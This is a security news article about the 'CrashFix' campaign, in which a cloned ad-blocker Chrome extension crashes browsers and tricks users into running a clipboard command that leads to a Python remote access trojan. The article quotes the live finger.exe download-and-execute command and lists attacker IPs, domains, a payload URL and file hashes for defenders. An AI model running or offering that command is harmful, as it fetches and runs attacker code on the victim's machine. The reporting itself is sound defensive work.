CrashFix Campaign Uses Malicious Browser Extensions to Push Fake Security Warnings

The researcher has uncovered a new browser-based social engineering campaign, dubbed “CrashFix”, that abuses a fake ad blocker extension to crash victims’ browsers and trick them into running malicious PowerShell commands.

Malicious “NexShield” Extension Masquerades as uBlock Origin Lite

In January 2026,Senior Security Operations Analyst Tanner Filip observed a victim whose browser repeatedly froze and then displayed a “CrashFix” pop-up claiming the browser had “stopped abnormally” and needed a scan.

The root cause was a Chrome extension called “NexShield  Advanced Web Protection,” installed from the official Chrome Web Store.

NexShield is a near one-to-one clone of the legitimate uBlock Origin Lite project by Raymond Hill, including a forged header that falsely credits him and points to a non-existent GitHub repository.

The extension ID is cpcdkmjddocikjdkbbeiaafnpdbdafmi, and the developer email is alaynna6899@gmail.com.

Behind the scenes, NexShield phones home to attacker infrastructure using a typo-squatted domain, nexsnield[.]com.

On install, update, and uninstall, it sends beacons with a unique UUID and version information, allowing operators to track every victim and every extension lifecycle event.

A Chrome Alarms timer delays the malicious behavior for about 60 minutes. Then it runs every 10 minutes afterward, reducing the chance that users connect the browser issues to the recent install.

The heart of the CrashFix behavior is a denial-of-service routine inside the extension. It rapidly opens a large number of Chrome windows. runtime ports in a tight loop, exhausting CPU and memory until the browser becomes unresponsive or crashes. Before this happens, a timestamp is saved locally.

When frustrated users force-quit and restart the browser, the extension records the timestamp. It opens a 400×600 pop-up window to the attacker’s /whats-new page.

This window displays the fake “CrashFix” security warning, claiming the browser crashed unexpectedly and urging the user to “run a scan.”

If the user follows the instructions, they are told to open the Windows Run dialog (Win+R) and press Ctrl+V.

Without their knowledge, the extension has already copied a malicious PowerShell command to the clipboard. Pasting and pressing Enter silently runs:

cmd /c start “” /min cmd /c “copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98[.]108|cmd.”

This copies the built-in finger.exe tool to %temp% as ct.exe, then uses it to pull and execute additional commands from 199.217.98[.]108.

Subsequent stages use obfuscated PowerShell to download and run more payloads, removing temporary files to reduce traces.

KongTuke, the threat actor behind this campaign, clearly prefers corporate targets. If the infected host is domain-joined, the PowerShell chain downloads a WinPython bundle from a Dropbox link and launches a Python script called modes.py.

This script is ModeloRAT, a full-featured Python remote access trojan. ModeloRAT encrypts C2 traffic with RC4, collects extensive system information, establishes persistence through the Run registry key as “MonitoringService,” and can drop and execute EXEs, DLLs, and Python scripts. Its C2 addresses resolve to 170.168.103[.]208 and 158.247.252[.]178 over HTTP, as reported huntress.

Non-domain (home) systems are pushed through a heavier, multi-layered PowerShell and DGA chain that, during analysis, ultimately returned only TEST PAYLOAD!!!!, suggesting that the branch is still under development or reserved for future use.

IOC / Artifact	What it is in simple terms
cpcdkmjddocikjdkbbeiaafnpdbdafmi	Malicious Chrome extension ID for NexShield
nexsnield[.]com	Attacker’s main server used by the extension for tracking installs and updates
199.217.98[.]108	Server contacted by finger.exe to fetch and run more commands
170.168.103[.]208	ModeloRAT command-and-control (C2) server
158.247.252[.]178	Second ModeloRAT C2 server
HKCUSoftwareMicrosoftWindowsCurrentVersionRunMonitoringService	Registry entry used to make ModeloRAT start when the user logs in
hxxps://www.dropbox[.]com/scl/fi/6gscgf35byvflw4y6x4i0/b1.zip?rlkey=bk2hvxvw53ggzhbjiftppej50&st=yyxnfu71&dl=1	Dropbox URL used to download the WinPython bundle that contains ModeloRAT
CPCDKMJDDOCIKJDKBBEIAAFNPDBDAFMI_2025_1116_1842_0.crx SHA256: c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c	Chrome extension file
SHA256: c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6	ModeloRAT payload (modes.py)
alaynna6899@gmail.com	Email address used to register the malicious NexShield extension
hxxp://temp[.]sh/utDKu/138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa.exe	Unknown payload (aa.exe)
SHA256: fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67	Core extensions script (background.js)
SHA256: 6399c686eba09584bbbb02f31d398ace333a2b57529059849ef97ce7c27752f4	GateKeeper .NET Payload (16933906614.dll)

Organizations should review browser extensions in their environment, block the listed domains and IPs, monitor for unusual use of finger.exe, and hunt for the above persistence and C2 artifacts across endpoints.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post CrashFix Campaign Uses Malicious Browser Extensions to Push Fake Security Warnings appeared first on Cyber Security News.